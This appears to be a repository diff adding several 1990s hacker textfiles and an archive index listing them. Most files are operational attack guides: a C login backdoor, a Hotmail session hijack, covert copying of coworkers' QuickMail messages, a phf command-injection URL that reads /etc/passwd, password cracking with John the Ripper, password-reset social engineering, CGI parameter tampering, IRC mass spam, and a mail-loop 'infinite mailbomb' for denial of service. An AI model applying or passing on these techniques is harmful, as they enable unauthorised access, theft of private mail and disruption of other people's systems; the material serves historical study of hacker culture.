directory and giving it superuser privlidges. Another type of exploit
involves causing a program which has superuser prividges to change your
group ID to 1, root, which effectively makes you the administrator of
the system.
Most of the time, these two types of attacks are used together. The hacker
will first get a login with brute force to gain access to the outer level of
the system, and then from there use an exploit of some kind to gain root
priviledges. After attaining root access, the hacker will install one or more
'back doors' to allow himself access to the system again. A very common one
is taking the source code of the login program and modifying it to accept
a certain password for any user, as well as the user's own password.
An example of a function in C that could do this would be:
check_backdoor(entry,access)
{
/* the variable entry is the password that the user entered
* the variable access determines whether or not to allow the
*/ user into the system. If access = 1 then the user is let in.
if (entry == "mybackdoor")
{
access = 1;
return;
}
cryptcheck(entry,access);
return;
}
In this example, mybackdoor would be the password that could be used on
any user account. If mybackdoor was not the entry, then the password
is hashed and checked against the password in /etc/passwd which allows
the back door to function without being noticed by anyone, including the
administrator.
I hope this information hhas been helpful in teaching you about the basis
of hacking. For more information, visit my home page or drop me an e-mail.
KwAnTAM_PoZeEtroN
Leader of the Black Angels
Ringmaster of the Ruiners Webring
Head of Psychotic security
http://kwantam.home.ml.org
kwantam@mailhost.net
+128
View File
@@ -0,0 +1,128 @@
============================================================================================
============================================================================================
---------------------------------->The Hotmail Hack<----------------------------------------
============================================================================================
============================================================================================
This file is all about Hotmail free internet based e-mail and how to gain access to
any account you want. (Well...almost). Anyways, I am not responsible for anything you do
with the information in this file and all the rest of the preeching to do with illegal stuff.
You may redistribute this file AS IS, you may not change the file in any way without my written
permission. This is the first file that I have written as a hacker and I did it for the
group which I have just joined, "The United Underground" also known as "u2". Anyways...enuph
of this boring junk and on with the fun stuff!!!!!
==============
==BACKGROUND==
==============
First a little bit of explanation about hotmail for those of you who are constipated in the
brain.
Hotmail is, as I hope you know, a webased e-mail system. Which in turn means that it uses cgi-
bin as a gateway to there local mashine where all the passwords are and e-mails are stored.
Hotmail requires you to enter a login name on one page and a password on another, this is the
first key to this hack. When in a Hotmail account there are many options you may choose such
as reading mail deleting mail, changeing the interface and so on. The last option is the logout
option, wich is the second key to this hack. For this hack you must know the user name of your
victim..err...subject. This is always the name in front of the @ in their e-mail address, so
that is easily obtained. You must also be using a browser which enables you to view the source
code for the page you are currently viewing. That is really it...So what's the catch you say?
Well yes...there is a catch, and I'm sure as I study the system more closely it will become
obsolete. But for now, your subject MUST be stupid enough to either forget, or not bother
to logout once they are done in the system. THAT IS THE KEY TO THIS HACK!!!!!!
==========
==HOW TO==
==========
Now for the steps of the hack......
//////
step 1
//////
The first step is to get the username of the subject and go to www.hotmail.com and login with
that user name. Make sure you have typed the username exactly right because hotmail will not
tell you if you have typed it incorrectly, they also log the IP's of people entering incorrect
login names.
//////
step 2
//////
It is now time to view the source code of the password page that you are on now. It should
say www.hotmail.com/cgi-bin/password.cgi in the URL box. Anyways, view the source for this
page. Five lines down or so from the top of the source code page, it will say
<form name="passwordform" action="URL" method="POST" target="_top">
That is a very important line....but before I tell you how to use that line, I'm going to side
track for a little theory behind this hack. Because there's NO point in a hack, if you
don't know how it works. That is the whole idea of hacking, to find out how systems work.
So anyways, when you login to hotmail, the cgi-bin gateway marks you as being IN the system.
If you don't logout, and you just leave the page, or turn off your computer, the Hotmail
system doesn't know that you are gone from your account. So back to the real text.
The action="URL" part of the line above is where the subjects account is located. So after the
real owner of the account has loged in and given his/her password, they will go to a page that
says......
http://somenumber/cgi-bin//start/username/anothernumber
in the URL box......
//////
step 3
//////
Hmmmmm...funny thing, that's the same number that we obtained earlier in this text from the
source code for the password page. So after you have that URL, you must type in into the URL
box ONLY!!!! You can not click the open button, or use an open command for reasons that are
way beond the grasp of this text. So after you've entered that URL, press enter, and watch
as hotmail gives you complete access over the subjects Hotmail account.
////////////////////////////////////////////////////////////////////////////////////////////////
/Now remember that this hack ONLY works if the owner of the account does NOT logout from his/ /
/her account. Also, please have mercey for the poor idiot on the other end that owns the /
/account, and do not delete any messages or any shit like that. Just be happy that you DID /
/gain access to the account and then leave. I have set up a hotmail account with a few e-mails/
/going in and out of there every once in a while. The address is oxyenn@hotmail.com (yes, that/
/is an extra n on oxygen, don't forget it). Hack this account freely, I realy don't care, but /
/please don't go using it to compose harassing or anonomous e-mail. That is lame, and if I do /
/find anyone doing it, I will find your IP from the login sequence, and trac you down, or, if /
/any legal action results in it, report your ip to the authorities. So please, it would be /
/alot easier if you just co-operate. Thank you:) /
////////////////////////////////////////////////////////////////////////////////////////////////
This file was made for newbies, and those who are always looking to learn. Not for all you
expirienced hackers who know it all, unless you realy wanted to read it. So don't bother
mailing u2 or me (if you somehow get my e-mail address) flamming us or shit like that.
/////\\ |||||||| ////////// |||||||||| ///////\\\\\\\ //\\ ||
// \\ || // // || /\ // \\ ||
// \\ || || || /\ // \\ ||
// \\ || || || /\ // \\ ||
// // || || || /\ // \\ ||
// // || || //////// || /\ // \\ ||
// // || || // // || /\ //////////////\\ ||
// // || || // || /\ // \\ ||
// // || \\ // || /\ // \\ ||
// // |||||||| \\\\\\\// |||||||||| /\ // \\||\\\\\\\\\\\
-assassin-
EOF
+97
View File
@@ -0,0 +1,97 @@
How To Use PC Pursuit Service
-----------------------------
Placing a PC Pursuit Call
-------------------------
* Use a modem to dial your local 2400 bps SprintNet access telephone
number with parameters settings of 8-N-1.
* Type @ D (CR)
SprintNet Prompt User Input Comments
======================================================================
(1) Terminal = D1 (CR) Input Terminal ID.
D1 is typical for
PC's. If not known,
type CR.
(2) @ C D/NYNYO/24,YOUR ID (CR) Type area code desired,
modem speed and your
user ID. (Note that
/3 = 300 bps, /12 = 1200
bps, /24 = 2400 bps).
(3) PASSWORD = PASSWORD (CR) Enter user Password
(4) D/NYNYO/24 Connected to target
CONNECTED city outdial modem.
(5) ATZ Type ATZ (in upper case)
(6) OK Modem responds as cleared.
(7) ATDT 7654321 Type ATDT (in upper case)
and the 7-digit number
you wish to dial.
(Some local numbers require
different dailing patterns.
check mnemonic.txt file for
more information)
(8) CONNECT (CR) (CR) You are now connected to
the computer that you
dialed. Procees as if
the number was dialed
directly.
NOTES:
-----
1. If the connection was not made, a BUSY will be seen within 30
seconds. The BUSY message means that the number dialed was either
busy, or not in service, or an invalid attempt to dial more than
required digits. A BUSY will also be seen after disconnecting from the
host computer, but you can dial another number by starting again
at the fifth step and typing ATZ and dialing the number.
2. PC Pursuit uses standard HAYES dialing commands, which enable
you to type the A/ (no CR) command to redial the previously
dialed number.
3. When a typing mistake is made in the second and third steps,
the log-on must be re-entered.
To Disconnect from PC Pursuit
-----------------------------
SprintNet Prompt User Input Comments
======================================================================
(CR) @ (CR) Escape to SprintNet
command level.
@ D (CR) At the @ sign,issue
disconnect command.
D/NYNYO/24 Disconnect from the
DISCONNECTED target city complete.
User is still connected
to SprintNet at the local
dial-up city. A PC Pursuit
can now be placed to
another city.
NOTES:
------
1. To DISCONNECT FROM SPRINTNET, log off your computer as usual, or
hang-up.

+95
View File
@@ -0,0 +1,95 @@
----/--------------------------------\-----
/ \
/ Hacking Quickmail for Macintosh \
< >
\ by The Brighter Buccaneer (1933) /
\ February 28, 1995 /
----\--------------------------------/----
Many companies use CE Software's QuickMail for their internal e-mail communications. QuickMail is the most common e-mail package on the Macintosh platform, and there are many different types of mail gateways to QuickMail (the most common is the Mail*Link SMTP to QuickMail gateway by StarNine).
If you happen to work for such a company here are some tips for hacking into the messages.
STORED MESSAGES: When users "file" QuickMail messages, the messages are stored locally on their desktop machine's hard drive. They are not stored on the central QuickMail server once they are filed, and therefore the security can be extremely lax depending on the user. If you log on to someone else's Macintosh with your own QuickMail account (don't be stupid), their filed messages and folders will be grayed out--you will not even be able to see message subjects.
The way to read these private messages is to copy them onto a floppy disk or over the network to your own drive (more on this later). The path to these filed messages is System Folder : Preferences : QuickMail Stuff : Personal Folders. You should find at least one folder in the "Personal Folders" folder--probably called "Filed Mail". Copy all the files and folders in "Personal Folders" area and take them back to a safe machine.
To copy the stored messages to your own machine over the network you must turn the victim's File Sharing on (System 7 and later only). The safest way to do this is when they are not around (duh...), or while you are pretending to help them with some sort of problem.
1) Go to the "Sharing Setup" control panel and turn on File Sharing.
2) Go to the "Users & Groups" control panel and open the "Guest" account. Make sure the "Allow Guests to Connect" box is checked.
3) Click once on their startup hard drive icon (the top icon in upper right-hand corner of the desktop), and choose "Sharing..." from the file menu.
4) Click on the "Share this item and it's contents" box, and also check the other boxes... in fact check every damn box you can see. That puppy is now shared!
5) Their hard drive is now shared, and will be accessable from your own machine via the Chooser's AppleShare icon. Just log on as guest and you're off to find their filed mail!
Once you have their private mail files back at your own machine you will have to use FileTyper (shareware) or Apple's ResEdit to change the creator to a text editor (MSWD = Microsoft Word, SNTE = SaintEdit), and the file type to TEXT (plain ascii text file). You can then open these files up without too much problem, although there will be some trash at the beginning and end of each file (this is the graphical form itself). The message's text should be plainly visible, but if you have problems, it is recommended to try a different text editor, or to use Retrieve It!'s "Peek In Any File..." option.
Quick Plug for Retrieve It!
Claris Clear Choice's Retrieve It! by Matt Pallakoff is a great utility for viewing and searching for text anywhere on a hard drive, floppy, or network drive. It will search the resource and data forks of any file, folder, or drive, and let you cut and paste any text that you find. It is a must-have from Macintosh hackers big and small! End of plug.
NOTES:
CE Software, Inc.
P.O. Box 65580
West Des Moines, IA 50265
(515) 224-1995, (800) 523-7638, or FAX: (515) 224-4534
CE.SUPPORT@applelink.apple.com
StarNine Technologies, Inc.
2550 Ninth Street, Suite 112
Berkeley, CA 94710
(510) 649-4949 or FAX: (510) 548-0393
info@starnine.com
+289
View File
@@ -0,0 +1,289 @@
Originally an Email to me.
this one is on hacking web pages, and i included alot more information
on other methods than the traditional passwd file method, which most the
web page texts are on in the library right now. I fixed this one so it
doesn't scroll on and on like my text on passwd files [=. Goat
-***Hacking Web Pages***-
by Goat
Introduction
Please know that hacking webpages is consitered lame
in many's opinions, and it will most likly not give
you a good reputation. People can always check logs
once notified of hacking and most likly your address
will come up and then at worst they will press charges
for some elaborate computer crimes law and you will
goto prison for up to 10 years and owe alot of $. So
please attempt to refrain from abusing your knowlage
on this subject. This is for informational purposes
only.
"Free" Web Pages
Free webpages is web page hosting companies
like Tripod and Geocities that host peoples web pages
for free and make money off advertising. There is ways
to hack these companies and have access to all users,
but it would be to complex for most people. This way
is simply social engineering which is not very hard to
do, so don't proclaim yourself an Uberhacker because
you vandalised a poor guy's webpage, who just happened
to have his information on his site. All you have to do
is set up an account with a free email service like
hotmail and find your target. On your targets page up
need to have the date of birth, name, and their old
email, or instead of the DOB there address (I have lost
my pass to a smaller company, and they needed the
address i had registered with). All these free web page
companies have their "verification" for people who have
lost there password to their page. All their is to it
is once you have this information is you either email
the company telling them you changed your email address
and once that is done wait about 2 weeks and then email
them again saying that you lost your password. Most will
email you telling you that you need some sort of
verification, like the DOB or Address. In which you
email them back and tell them and get a new password.
On the other hand, companies like Geocities are too
busy for email so they have set up a web site where
members can get there password back
(http://www.geocities.com/help/pass_form.html).
User's Pages
There is many different methods of hacking users
web pages on a server. I will attempt to list as many
ways possible but don't expect very much in depth
information.
Getting Passwords
Okay suppose you found a page you want to hack,
that is on someone elses server thats a basic server,
light security. Okay very light security. I will be
truthful. This pretty much works on servers with no
security [=.
Getting a passwd file is pretty easy. Simply telnet
into the servers FTP anonymously and look in the ETC
directory and get the file called Passwd.
Another way to get them is to find your target and in
a WWW browser type
cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd after
the servers name. For example the name may be
http://www.hackme.com/, you would goto
http://www.hackme.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd except instead of www.hackme.com you would replace that with your targets URL.
You may get a passwd file that has no user accounds,
but only defaults which where the encrypted password
should be a * would be in its place. On certain servers
with this you may have a shadowed passwd but on all
passwd files i have come across there is some user
names like FTP and NEWS that have no encrypted passwords
which is replaced with *. If you find only this and no
encrypted passwds you probably have found a fixed
passwd file and you must try another method of hacking
the server. You need to examine this file and look for
a line in the text that looks like this:
rrc:uXDg04UkZgWOQ:201:4:Richard Clark:/export/home/rrc:/bin/kshdoes not need to look exactly like that, the only important part it needs it the uXDg04UkZgWOQ and rcc, which is the login part. Get a program called John the Ripper whcih can be found on any hacking site on the web. If you are to lazy, or stupid to find one on the web heres a good place to go for newbies http://www.hackersclub.com/km/
I will not go in depth right here on passwd files, but i
have written a text on passwd's going good into the
subject which can be found at
http://www.xtalwind.net/~lmclaulin/ugpasswd.txt.
Anyway, using John the Ripper is easy, if you want to
quickly hack something give the command (in DOS prompt)
"john passwd -single" Replace "passwd" in there with
the name of the passwd file, you may have saved it as
passwd.txt or something. An important thing to remember
is that the passwd file needs to be in the same
directory as John. To see a list of other methods for
cracking a passwd file, just type John and it will give
you a list of commands. I have found john won't work
for me with wordlists but other people say that it
works fine for them. You can use incremental mode
(to use that the command is "John passwd -incremental"
It takes like a few days to finish so I wouldn't really
want it to let it go on forever and ever if it was
just some normal passwd file. Unless its like NASA's
passwd file (keep dreaming, they probably change
passwords everyday and that file is very outdated)
I wouldn't want to use that too much. To see a
complete list of John's cracking capabilities, just
type john and it will give you a list of commands
that you may use.
If you Have an Account with the Users Server
The next section is on how you can hack a webpage if
you already have an account with the server.
This was taken from a text by Lord Somer and since
i don't want to butcher something important out of it
I will just keep the text in its whole form.
Exploiting Net Adminstration CGI (taken from a text by Lord Somer)
#######################################
# Exploiting Net Administration Cgi's #
# like nethosting.com #
# Written by:Lord Somer #
# Date:9/2/97 #
#######################################
Well since nethosting.com either shutdown or whatever I figured what the hell before I forget
how I did the more recent hacks etc... I'd tell you how so maybe you'll find the same sys
elsewhere or be able to use it for ideas.
Basically Nethosting.com did all it's administration via cgi's at net-admin.nethosting.com,
well you need an account, card it if necessary, log in to net-administration, you'll see crap
like ftp administration, email, etc... who really cares about e-mail so we'll go to ftp.
Click on ftp administration. Lets say you were logged in as 7thsphere.com your url would be
something like:
http://net-admin.nethosting.com/cgi-bin/add_ftp.cgi?7thsphere.com+ljad32432jl
Just change the 7thsphere.com to any domain on the sys or if in the chmod cgi just del that part
but keep the + sign and you edit the /usr/home dir. In the ftp administration make a backdoor
account to that domain by creating an ftp who's dir is / since multiple /// still means /.
Once you have your backdoor have fun. Oh yeah and in the email you can add aliases like I did
to rhad's e-mail account at 7thsphere, why the hell is he on that winsock2.2 mailing list?
Well the basic theory of this type of exploitation is that:
- the cgi is passed a paramater which we change to something else to edit it's info
- since it uses the stuff after the + to check that it's a valid logged
in account(like hotmail does), it dosen't check the password again.
- multiple ///'s in unix just mean a /, thus we can get access to people's dir or the entire
/usr/home dir
I used this method for hacking a few well known places:
7thsphere.com
sinnerz.com
hawkee.com
warez950.org
lgn.com
and several other unknown sites.
Please remember if you ever use a method of mine please credit me and link to my site thanks.
########################################
# Contact Info: #
# E-mail: webmaster@lordsomer.com #
# ICQ: 1182699 #
# Site: The Hackers Layer #
# http://www.lordsomer.com #
# Other Sites: #
# Hackers Club #
# http://www.hackersclub.com/km #
########################################
Other Ways Of Hacking User Pages
Another method that may work with really stupid
Admins is sometimes, when you FTP to a server, you can
leave your home directory and go back a few directories
and find your targets directory. Once you have done
that if you can access the HTML files and save them
to disk and then "edit them". The HTML files may or
may not be stored on FTP but with smarter admins they
are not accessable by other users.
Things that Don't Fit In Other Catagories
There are many more ways of hacking web pages.
Peoples stupidity is a good way. Many passwords are
guessable if they are not hackable. Its not hacking
but simply using a persons stupidity. If you were to
get root on a server you could have access to
everything on the server, so if you wanted to hack a
servers webpage (or access anything else you want on
the server) you would probably have to get an account
and you could run an exploit on the server, but that
is something newbies should probably not try until you
know more about what you are doing.
Why Hacking Web Pages (and other things) is a
Bad Idea...
Hacking web pages is an obvious signal that
someone has hacked your server, which can reminer to
forgetful admins to check there logs and immediatly call
your ISP to cancel your account along with the FBI to
come bust you on some elaborate computer crime law.
Hacking school grades is another stupid thing you should
never do. I know its off topic but its important to
remember, because they are two things that both get
people busted alot. Don't believe me? Let me show you a
few pieces of articles from news at the hackersclub. The
entire article (instead of the parts where the hacker
got busted) may be read from the address beneath each
section.
"Kubojima is accused of taking over seven web pages of the
Osaka-based television network Asahi Broadcasting Company on May
18 and replacing five of the seven weather charts on the pages with
pornographic pictures. He also faces charges under Japan's
anti-obscenity laws.
If convicted, Kubojima faces a fine of one
million yen ($8,600) and a prison term of up to five
years under tough penalties against hackers adopted in
1992. "
http://web5.hackersclub.com/km/news/1997/may/news4.txt
"He is 18, and may be looking at up to 10 years in prison.
He hasn't stolen anything, he hasn't hurt anybody and many familiar
with the crime that he is accused of committing say the possible
punishment borders on the absurd.
The 18-year-old and a 17-year-old friend, police say, broke into a
computer network.
They added some funny pictures to a World Wide Web site run by
the network operator, a Texas Internet service provider called
FlashNet, police say. The two figured out some of the user names and
passwords used by FlashNet customers.
Then they left.
The 18-year-old was arrested on suspicion of third-degree felonies
that carry a sentence of two to 10 years in prison and a fine of up to
$10,000. His friend, who was arrested on suspicion of a less severe
misdemeanor, faces up to a year in jail and a $4,000 fine. "
http://web6.hackersclub.com/km/news/1997/august/news3.txt
"Student faces felony for hacking grades
>From NewsTalk 750 WSB
A 15-year-old Florida High School student faces felony
charges for allegedly hacking his way into the school
computer to change "F's" into "A's." Jason Westerman
claims it was only a joke, but he faces felony charges
for offenses against intellectual property and computer
users. He's been suspended for ten days. Westwood high
school administrators want to expel him. "
http://web6.hackersclub.com/km/news/1997/june/news4.txt
Getting busted hacking will not be a fun process
unless you like paying $10,000 and having a date with
someone names Spike in the prison's cafateria for the
next 3 years. Be wise about what you leave behind,
because soon you may be suprised by a knock at the door
by your neighborly FBI agent.
+50
View File
@@ -0,0 +1,50 @@
To advertise by msging,inviting, or noticing everyone on a server is pretty easy to do.
=======================================================================================
Written by Lord Somer
www.lordsomer.com
Follow these steps:
Download massirc.exe* [26.6k] and you might also need cswsock.vbx [28.5k]
Run it, you'll have an intro screen then a settings screen fill them out just like
your normal mirc but don't use same nick as the one that you normally use.
This works only on certain servers and here's a list of them:
us.undernet.org
us.chatnet.org
us.icenet.org
irc.aohell.org
home.metnet.com
irc.pontocom.com.br
atlanta.ga.us.galaxynet.org
ocean.us.austnet.org
irc2.sodre.net
sunrise.ca.us.another.net
Shadow.FL.US.EarthInt.Net
rochester.mi.us.starlink.org
us.dal.net
If it works on a server I don't have on there then tell me the address of that server.
once they are all set click next. It will connect to the server then click next again.
Ok Let me explain the options:
Send Notice Messages this will notice every user on the system your message.
Send PrivMsg will msg every user on the system your message.
Send Invite this will invite them to a channel.
Randomly Change NickName every 10 seconds this is a definite must to be checked in
unless you like to be klined or glined alot.
Send 1 packet every seconds this should be set somewhere from 5-8, I prefer 7
this is to keep the server's flood protection off your ass.
Start Sending Nick with letter, well if you got knocked off before set it to the last
letter it was at or leave it at a, this is the letter of the users name it starts at.
A blank box, in here enter the chan to invite them to or the message you want
noticed or msged to them. Now with the options set, just click send now and minimize.
+62
View File
@@ -0,0 +1,62 @@
++<======================================>++
||| The Infinite Mailbomb |||
||| |||
||| by ospbaboon and KwAnTAM_PoZeEtroN |||
++<======================================>++
The ultimate mailbomber would be, by definition, one that not only
sends a large volume of mail, but does so quickly and without a large
cost in bandwidth of the computer that you are running. It would also
be untraceable. The infinite mailbomb fits all of these criteria in
such a way that makes it quite possibly the best mail bombing approach
ever created. As such, it can also serve as a very effective
denial-of-service attack.
With that said, here is how to set up, and set off, the infinite mailbomb:
1) Set up two accounts at http://mailhost.net
The accounts in this example are abc@mailhost.net and xyz@mailhost.net
2) In the settings of abc@mailhost.net make it forward to xyz@mailhost.net
and to the target (in this example, lamer@aol.com)
3) In the settings of xyz@mailhost.net make it forward to abc@mailhost.net
and to the target (in this example, lamer@aol.com)
4) Send a message through a mixmaster or cypherpunks chain remailer to
abc@mailhost.net and make the return address that of the target
(lamer@aol.com in this example) so that once the server which is being
bombed starts to bounce messages, it will be bouncing to itself.
5) Wait for as long as you want. The longer you wait, the more messages
will be sent (obviously). Also, since mailhost.net adds a small message
at the bottom of each message that is sent through it, the message will
grow bigger and bigger. This is what's happening as you wait: abc@mailhost.net
has forwarded the message it received to lamer@aol.com and do xyz@mailhost.net,
which has in turn forwarded to lamer@aol.com and back to abc@mailhost.net, where
the cycle starts once more. The bounces between the mailhost.net accounts
happens very quickly, and since mailhost.net has a multi-T3 connection to
the internet, it is sending messages very fast to lamer@aol.com
6) Once you have decided to stop the bombing (if you do decide to stop it,
let it run at least overnight first), simply change the settings of
abc@mailhost.net so that it doesn't forward to anywhere. Next time you want
to use this technique, just set it so that it once again forwards to
xyz@mailhost.net and also to your new target, for example lamer2@aol.com. Then
just change the settings of xyz@mailhost.net so that instead of forwarding to
lamer@aol.com it forwards to lamer2@aol.com
Denial-of-service with this is simple: pick a server and send an infinite bomb
to the root account of the server (root@the.target.server). This will eventually
fill up the hard drive of the server, and quite possibly crash it.
Original idea by:
ospbaboon
ospbaboon@mailhost.net
http://www.geocities.com/RodeoDrive/1816/
Refined, anonymized, and typed by:
KwAnTAM_PoZeEtroN
kwantam@mailhost.net
http://kwantam.home.ml.org/
+191
View File
@@ -0,0 +1,191 @@
# INTERNET
Files Dealing With Hacking on the Internet
## FILES
=> gemini://informis.land/textfiles/hacking/INTERNET/anon-mail.txt [ 3260] Hackerdevil's Guide to Sending Anonymous E-mails to Someone Without a Program
=> gemini://informis.land/textfiles/hacking/INTERNET/arpa.man [ 86379] Arpanet Information Brochure (December 1985)
=> gemini://informis.land/textfiles/hacking/INTERNET/arpanet.hac [ 4439] Screwing around with Arpanet, by Hackman
=> gemini://informis.land/textfiles/hacking/INTERNET/arpanet.txt [ 4736] Attacking Arpanet by the Hackman of Hollow Hills
=> gemini://informis.land/textfiles/hacking/INTERNET/arpanet1.con [ 4505] Hacking Arpanet, by The Hackman of The Hollow Hills
=> gemini://informis.land/textfiles/hacking/INTERNET/arpanet1.txt [ 7040] Hacking ARPANET Part I, by The Source of The Listening Post
=> gemini://informis.land/textfiles/hacking/INTERNET/arpanet2.txt [ 12160] Hacking ARPANET Part II by The Source of The Listening Post
=> gemini://informis.land/textfiles/hacking/INTERNET/arpanet3.txt [ 7552] Hacking ARPANET Part III by The Source
=> gemini://informis.land/textfiles/hacking/INTERNET/arpanet4.txt [ 4608] Hacking ARPANET Part IV by The Source
=> gemini://informis.land/textfiles/hacking/INTERNET/arpanet5.txt [ 8064] Hacking ARPANET Part V by The Source
=> gemini://informis.land/textfiles/hacking/INTERNET/arpanet6.txt [ 13824] Hacking ARPANET Part VI by The Source
=> gemini://informis.land/textfiles/hacking/INTERNET/bctj1_04.txt [ 7457] Ethernet Fields
=> gemini://informis.land/textfiles/hacking/INTERNET/bomb.txt [ 8594] How to Send Fake Mail Using SMTP Servers by Hunter
=> gemini://informis.land/textfiles/hacking/INTERNET/bump.txt [ 8231] Things that go Bump in the Net, by David Chess of IBM
=> gemini://informis.land/textfiles/hacking/INTERNET/denning.txt [ 58773] Concerning Hackers who Break into Computer Systems (October 1, 1990)
=> gemini://informis.land/textfiles/hacking/INTERNET/dial_5 [ 5766] Dialout List #5, by Spin-Doc (February 22, 1994)
=> gemini://informis.land/textfiles/hacking/INTERNET/dialout.txt [ 1785] A Collection of Internet Dial-Outs
=> gemini://informis.land/textfiles/hacking/INTERNET/dialout1.txt [ 68938] Novice Manual on Using Outdial Modems by Blue Adept
=> gemini://informis.land/textfiles/hacking/INTERNET/dialoutslst.hac [ 29446] (I)nter(N)et->(T)ym(N)et List Version 1.0 - January 1991 -
=> gemini://informis.land/textfiles/hacking/INTERNET/disabled [ 3072] Disabled Membership Guidelines and Rules for PC-Pursuit (April 13, 1992)
=> gemini://informis.land/textfiles/hacking/INTERNET/dummy22.txt [ 423772] Big Dummy's Guide to the Internet, v.2.2 by the Electronic Frontier Foundation (1994)
=> gemini://informis.land/textfiles/hacking/INTERNET/emsss.txt [ 10317] The Art of E-Mail Forging and Tracing Explained in one Simple Text
=> gemini://informis.land/textfiles/hacking/INTERNET/engineer.rpt [ 19456] Recommendations Report for File Transfer Via PC Pursuit (January 3, 1989)
=> gemini://informis.land/textfiles/hacking/INTERNET/equip [ 2048] PC Pursuit: Equipment and Software Requirements
=> gemini://informis.land/textfiles/hacking/INTERNET/esnet.txt [ 58650] Terminal Servers and Network Security, by C.E. Bemis and Lynn Hyman (December 12, 1990)
=> gemini://informis.land/textfiles/hacking/INTERNET/exploits.txt [ 3714] A Collection of Exploits from Legions of the Underground
=> gemini://informis.land/textfiles/hacking/INTERNET/firewall.txt [ 5904] Internet Firewall by Darkstar of NFG
=> gemini://informis.land/textfiles/hacking/INTERNET/ftpintro [ 7861] Anonymous FTP: Questions, Answers, Etc. by Odin (January 5, 1990)
=> gemini://informis.land/textfiles/hacking/INTERNET/fwall.txt [ 5834] Internet Firewalls, by DARKSTAR of NFG
=> gemini://informis.land/textfiles/hacking/INTERNET/gtmhh-bs1.txt [ 12168] The Guide to (Mostly) Harmless Hacking: Beginners' Series #1 by Carolyn Meinel
=> gemini://informis.land/textfiles/hacking/INTERNET/gtmhh-cc1.txt [ 19786] The Guide to (Mostly) Harmless Hacking: Computer Crime Law Issue #1 by Peter Thiruselvam and Carolyn Meinel
=> gemini://informis.land/textfiles/hacking/INTERNET/gtmhh1-1.txt [ 9089] The Guide to (Mostly) Harmless Hacking: Volume 1 Number 1
=> gemini://informis.land/textfiles/hacking/INTERNET/gtmhh1-2.txt [ 21648] The Guide to (Mostly) Harmless Hacking: Volume 1 Number 2 (How to Forge E-Mail)
=> gemini://informis.land/textfiles/hacking/INTERNET/gtmhh1-3.txt [ 9158] The Guide to (Mostly) Harmless Hacking: Volume 1 Number 3 (How Finger Can Be Used)
=> gemini://informis.land/textfiles/hacking/INTERNET/gtmhh1-4.txt [ 21770] The Guide to (Mostly) Harmless Hacking: Volume 1 Number 4 (How to Get Usenet Spammers Kicked Off)
=> gemini://informis.land/textfiles/hacking/INTERNET/gtmhh1-5.txt [ 12585] The Guide to (Mostly) Harmless Hacking: Volume 1 Number 5 (How to Get Email Spammers Kicked off Their ISPs)
=> gemini://informis.land/textfiles/hacking/INTERNET/gtmhh1-6.txt [ 18850] The Guide to (Mostly) Harmless Hacking: Volume 1 Number 6 (How to Nuke Offensive Web Sites)
=> gemini://informis.land/textfiles/hacking/INTERNET/gtmhh2-2.txt [ 13662] The Guide to (Mostly) Harmless Hacking: Volume 2 Number 2 (Linux)
=> gemini://informis.land/textfiles/hacking/INTERNET/gtmhh2-4.txt [ 37561] The Guide to (Mostly) Harmless Hacking: Volume 2 Number 4 (Port Surfing)
=> gemini://informis.land/textfiles/hacking/INTERNET/gtmhh_bs31.txt [ 24576] The Guide to (Mostly) Harmless Hacking: Volume 3 Number 1 (How to Get a Shell Account)
=> gemini://informis.land/textfiles/hacking/INTERNET/gtmhh_bs32.txt [ 15961] The Guide to (Mostly) Harmless Hacking: Volume 3 Number 2 (How to Get a Good Shell Account)
=> gemini://informis.land/textfiles/hacking/INTERNET/hackenc.txt [ 143731] The Hackers Encyclopedia by Logik Bomb (1995-1996 First Edition)
=> gemini://informis.land/textfiles/hacking/INTERNET/hackfaq.hac [ 106697] FAQ to #hack IRC Channel, Beta .007
=> gemini://informis.land/textfiles/hacking/INTERNET/hackirc.txt [ 14052] Hacking IRC: The Definitive Guide by Klider (1996)
=> gemini://informis.land/textfiles/hacking/INTERNET/hackpage.txt [ 10379] Hacking Webpages: THe Ultimate Guide by Virtual Circuit and Psychotic
=> gemini://informis.land/textfiles/hacking/INTERNET/hackwww.txt [ 2843] How to Hack the WWWboard Message Board 2.0 by kM of Hackers Club (May 12, 1997)
=> gemini://informis.land/textfiles/hacking/INTERNET/haq.01 [ 35596] The HAQ Frequently Asked Questions by Belisarius (June 11, 1994)
=> gemini://informis.land/textfiles/hacking/INTERNET/haq.02 [ 30544] The HAQ Frequently Asked Questions by Belisarius (June 11, 1994) (Part II)
=> gemini://informis.land/textfiles/hacking/INTERNET/haq.03 [ 43250] The HAQ Frequently Asked Questions by Belisarius (June 11, 1994) (Part III)
=> gemini://informis.land/textfiles/hacking/INTERNET/hexedit.txt [ 3454] How to Hexedit mIRC - Flood Protection/Nuking by Lord Somer of The Hackers Layer
=> gemini://informis.land/textfiles/hacking/INTERNET/hi.txt [ 6924] Introduction to Hacking by KwAnTAM_PoZeEtroN
=> gemini://informis.land/textfiles/hacking/INTERNET/hotmail.txt [ 6827] The Hotmail Hack
=> gemini://informis.land/textfiles/hacking/INTERNET/how-to [ 4096] How to use the PC-Pursuit Service
=> gemini://informis.land/textfiles/hacking/INTERNET/hqm.txt [ 4040] Hacking Quickmail for Macintosh by The Brighter Buccaneer (February 28, 1995)
=> gemini://informis.land/textfiles/hacking/INTERNET/hwp.txt [ 12966] Hacking Web Pages, by Goat
=> gemini://informis.land/textfiles/hacking/INTERNET/iad.txt [ 2157] How to Advertise by Msging, Inviting, or Noticing Everyone on a Server by Lord Somer
=> gemini://informis.land/textfiles/hacking/INTERNET/ib.txt [ 3046] The Infinite Mailbomb by OSPbaboon and KwAnTAM_PoZeEtroN
=> gemini://informis.land/textfiles/hacking/INTERNET/inet2000.txt [ 3703] The iNET 2000 Online Service, by Deicide (April 5, 1993)
=> gemini://informis.land/textfiles/hacking/INTERNET/inetsec.txt [ 8903] A Guide to Internet Security: Becoming an Ubercracker and Becoming an Uberadmin to Stop Ubercrackers v1.1 by Christopher Klaus (December 5, 1993)
=> gemini://informis.land/textfiles/hacking/INTERNET/internet.doc [ 13018] The Beginner's Guide to the Internet by Weaons Master
=> gemini://informis.land/textfiles/hacking/INTERNET/internet.hac [ 49024] A Hacker's Guide to the Internet, by Gatsby 1991
=> gemini://informis.land/textfiles/hacking/INTERNET/ipd.hac [ 2004] Countries connected to the International Packet Switching Stream by The Force
